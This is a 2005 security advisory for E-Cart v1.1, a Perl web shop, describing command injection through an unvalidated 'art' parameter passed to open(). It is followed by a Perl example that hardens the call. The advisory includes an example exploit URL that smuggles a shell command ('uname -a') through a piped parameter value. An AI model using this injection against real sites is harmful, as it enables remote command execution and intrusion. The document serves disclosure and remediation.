============================================================
Title: E-Cart v1.1 Remote Command Execution
Vulnerability discovery: SoulBlack - Security Research - http://soulblack.com.ar
Date: 20/04/2005
Severity: High. Remote Users Can Execute Arbitrary Code.
Affected version: <= E-Cart 2004 v1.1
Vendor: http://www.yazaport.com/kadfors/kwamd/mods/ecart/index.cgi
============================================================

*Summary

E-Cart is a mod of WebAPP written in Perl. It is a web shop.

============================================================
*Problem Description:

The bug is in the file index.cgi: the variable art is passed to "open()"
without any validation of its contents, allowing an attacker to execute
arbitrary commands.

Vulnerable code
---------------
sub viewart {
    &cartfooter;
    open(DATA, "$catdir/$info{'cat'}/$info{'art'}"); hold(DATA); chomp(@data = <DATA>); release(DATA); close(DATA);
...
...
...

============================================================
*Example:

http://SITE/DIRTOECART/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp-ns315.dat|uname%20-a|

============================================================
*Fix:

Contact the Vendor.
============================================================
--
SoulBlack - Security Research
http://www.soulblack.com.ar

--
Iñaki Cormenzana
SoulBlack's Staff
Y3VhbmRvIHRlbmVtb3MgZWwgbWljcvNmb25vLCB0ZW5lbW9zIHNvdWwuLi4=
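The open() call quoted in the advisory can be hardened as sketched below. This is an added example, not E-Cart code or a vendor patch; read_article, the allow-list pattern and the temporary catalogue directory are assumptions made for illustration.

```perl
#!/usr/bin/perl
# Added example (not E-Cart code): hardened replacement for the open() in viewart.
use strict;
use warnings;
use File::Temp qw(tempdir);
use File::Spec;

# Constructed catalogue tree standing in for $catdir (assumption).
my $catdir = tempdir(CLEANUP => 1);
my $catsub = File::Spec->catdir($catdir, 'reproductores_dvd');
mkdir($catsub) or die "mkdir: $!";
my $sample = File::Spec->catfile($catsub, 'reproductordvp-ns315.dat');
open(my $out, '>', $sample) or die "create: $!";
print {$out} "DVP-NS315\n199.00\n";
close($out);

# The advisory's call was: open(DATA, "$catdir/$info{'cat'}/$info{'art'}");
# With two arguments Perl parses the mode out of the string itself, so a
# value ending in "|" is run as a command instead of being opened as a file.

# read_article() is a hypothetical name; returns (\@lines, undef) or (undef, $error).
sub read_article {
    my ($cat, $art) = @_;
    # Allow-list: a single path component each, no "/", "|", ";", spaces or
    # NULs, and no leading dot (which also rules out "." and "..").
    for my $part ($cat, $art) {
        return (undef, 'rejected name')
            unless defined $part && $part =~ /\A[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}\z/;
    }
    my $path = File::Spec->catfile($catdir, $cat, $art);
    # Three-argument open: the mode is fixed to '<', the path is only a path.
    open(my $fh, '<', $path) or return (undef, "open failed: $!");
    chomp(my @data = <$fh>);
    close($fh);
    return (\@data, undef);
}

# First value is a normal article name, second is the value from the advisory.
for my $art ('reproductordvp-ns315.dat', 'reproductordvp-ns315.dat|uname -a|') {
    my ($data, $err) = read_article('reproductores_dvd', $art);
    printf "%-38s => %s\n", "'$art'", $err ? "ERROR ($err)" : join(', ', @$data);
}

# Even without the allow-list, three-argument open treats the whole string as
# a file name, so this fails with "No such file or directory" and runs nothing.
my $literal = File::Spec->catfile($catsub, 'reproductordvp-ns315.dat|uname -a|');
my $opened  = open(my $fh, '<', $literal);
print "3-arg open on piped name: ", ($opened ? 'opened' : "failed ($!)"), "\n";
```

The allow-list and the three-argument form are independent layers: the first keeps the value inside the catalogue directory, the second removes the mode parsing that made the pipe character meaningful.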